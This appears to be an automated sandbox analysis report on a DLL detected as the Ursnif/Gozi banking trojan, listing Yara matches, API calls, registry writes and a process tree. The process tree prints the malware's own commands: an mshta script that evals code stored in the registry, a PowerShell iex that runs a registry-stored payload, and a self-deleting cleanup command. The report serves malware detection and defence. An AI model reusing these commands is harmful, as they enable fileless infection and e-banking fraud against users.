Source: 85-0f8009-68ddb2ab[1].js.5.dr String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.5.dr String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000001.00000002.1037430854.00000000008EB000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_05FA5ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 2_2_05FA5ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 2_2_05FA5ECA
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBCD7A NtQueryInformationProcess, 2_2_05FBCD7A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 2_2_05FAACD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 2_2_05FB6CBC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 2_2_05FBAC94
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 2_2_05FA7E14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 2_2_05FAA027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 2_2_05FB7AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 2_2_05FA45FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FA9DAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 2_2_05FB956E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB4C67 NtGetContextThread,RtlNtStatusToDosError, 2_2_05FB4C67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FA37E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 2_2_05FB1606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 2_2_05FC298D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB40A7 memset,NtQueryInformationProcess, 2_2_05FB40A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 2_2_05FA7878
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAAA15 NtQuerySystemInformation,RtlNtStatusToDosError, 2_2_05FAAA15
Source: C:\Windows\explorer.exe Code function: 36_2_04DC1DF4 NtWriteVirtualMemory, 36_2_04DC1DF4
Source: C:\Windows\explorer.exe Code function: 36_2_04DA7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 36_2_04DA7DA0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB3EF4 NtQuerySystemInformation, 36_2_04DB3EF4
Source: C:\Windows\explorer.exe Code function: 36_2_04DC46EC NtAllocateVirtualMemory, 36_2_04DC46EC
Source: C:\Windows\explorer.exe Code function: 36_2_04DBF0D0 NtReadVirtualMemory, 36_2_04DBF0D0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB1084 NtQueryInformationProcess, 36_2_04DB1084
Source: C:\Windows\explorer.exe Code function: 36_2_04DA69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 36_2_04DA69DC
Source: C:\Windows\explorer.exe Code function: 36_2_04DAB980 NtMapViewOfSection, 36_2_04DAB980
Source: C:\Windows\explorer.exe Code function: 36_2_04DA1148 NtCreateSection, 36_2_04DA1148
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC1CB8 CreateProcessAsUserA, 2_2_05FC1CB8
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBED4B 2_2_05FBED4B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA4C03 2_2_05FA4C03
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC3EAF 2_2_05FC3EAF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC7188 2_2_05FC7188
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAD0DC 2_2_05FAD0DC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB48AD 2_2_05FB48AD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBD057 2_2_05FBD057
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB8BF3 2_2_05FB8BF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE384 2_2_05FAE384
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA62FA 2_2_05FA62FA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBDA71 2_2_05FBDA71
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 36_2_04DAECE0
Source: C:\Windows\explorer.exe Code function: 36_2_04DA96D8 36_2_04DA96D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DADF58 36_2_04DADF58
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA074 36_2_04DCA074
Source: C:\Windows\explorer.exe Code function: 36_2_04DBB814 36_2_04DBB814
Source: C:\Windows\explorer.exe Code function: 36_2_04DA69DC 36_2_04DA69DC
Source: C:\Windows\explorer.exe Code function: 36_2_04DA49C4 36_2_04DA49C4
Source: C:\Windows\explorer.exe Code function: 36_2_04DBD92C 36_2_04DBD92C
Source: C:\Windows\explorer.exe Code function: 36_2_04DADA3C 36_2_04DADA3C
Source: C:\Windows\explorer.exe Code function: 36_2_04DBAA28 36_2_04DBAA28
Source: C:\Windows\explorer.exe Code function: 36_2_04DAFCA0 36_2_04DAFCA0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB1C0C 36_2_04DB1C0C
Source: C:\Windows\explorer.exe Code function: 36_2_04DA65D8 36_2_04DA65D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB75D8 36_2_04DB75D8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB8DD0 36_2_04DB8DD0
Source: C:\Windows\explorer.exe Code function: 36_2_04DA5DA8 36_2_04DA5DA8
Source: C:\Windows\explorer.exe Code function: 36_2_04DB25A4 36_2_04DB25A4
Source: C:\Windows\explorer.exe Code function: 36_2_04DC7D44 36_2_04DC7D44
Source: C:\Windows\explorer.exe Code function: 36_2_04DCC560 36_2_04DCC560
Source: C:\Windows\explorer.exe Code function: 36_2_04DB6528 36_2_04DB6528
Source: C:\Windows\explorer.exe Code function: 36_2_04DBCE90 36_2_04DBCE90
Source: C:\Windows\explorer.exe Code function: 36_2_04DD0614 36_2_04DD0614
Source: C:\Windows\explorer.exe Code function: 36_2_04DA1600 36_2_04DA1600
Source: C:\Windows\explorer.exe Code function: 36_2_04DBA0F0 36_2_04DBA0F0
Source: C:\Windows\explorer.exe Code function: 36_2_04DB9850 36_2_04DB9850
Source: C:\Windows\explorer.exe Code function: 36_2_04DB782C 36_2_04DB782C
Source: C:\Windows\explorer.exe Code function: 36_2_04DC19FC 36_2_04DC19FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA9FC 36_2_04DCA9FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DB99F8 36_2_04DB99F8
Source: C:\Windows\explorer.exe Code function: 36_2_04DAB9E8 36_2_04DAB9E8
Source: C:\Windows\explorer.exe Code function: 36_2_04DA596C 36_2_04DA596C
Source: C:\Windows\explorer.exe Code function: 36_2_04DC6250 36_2_04DC6250
Source: C:\Windows\explorer.exe Code function: 36_2_04DCEA40 36_2_04DCEA40
Source: C:\Windows\explorer.exe Code function: 36_2_04DD027C 36_2_04DD027C
Source: C:\Windows\explorer.exe Code function: 36_2_04DB7218 36_2_04DB7218
Source: C:\Windows\explorer.exe Code function: 36_2_04DA2A34 36_2_04DA2A34
Source: C:\Windows\explorer.exe Code function: 36_2_04DA9A34 36_2_04DA9A34
Source: C:\Windows\explorer.exe Code function: 36_2_04DCE220 36_2_04DCE220
Source: C:\Windows\explorer.exe Code function: 36_2_04DC93FC 36_2_04DC93FC
Source: C:\Windows\explorer.exe Code function: 36_2_04DC03EC 36_2_04DC03EC
Source: C:\Windows\explorer.exe Code function: 36_2_04DCA3B2 36_2_04DCA3B2
Source: C:\Windows\explorer.exe Code function: 36_2_04DA7B44 36_2_04DA7B44
Source: C:\Windows\explorer.exe Code function: 36_2_04DBB378 36_2_04DBB378
Source: C:\Windows\explorer.exe Code function: 36_2_04DC4B78 36_2_04DC4B78
Source: C:\Windows\explorer.exe Code function: 36_2_04DB6B00 36_2_04DB6B00
PE file does not import any functions
Source: fcanujkk.dll.29.dr Static PE information: No import functions for PE file found
Source: m5xmn43s.dll.32.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@43/151@17/2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 2_2_05FAA7B1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{53D6E16D-5C93-11EB-90EB-ECF4BBEA1588}.dat Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{FA89DFE9-1191-3C17-6BCE-D530CFE2D964}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6297719A-59AF-E450-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF0E355E1BD9BB118B.TMP Jump to behavior
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Virustotal: Detection: 33%
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll ReversingLabs: Detection: 25%
Source: regsvr32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
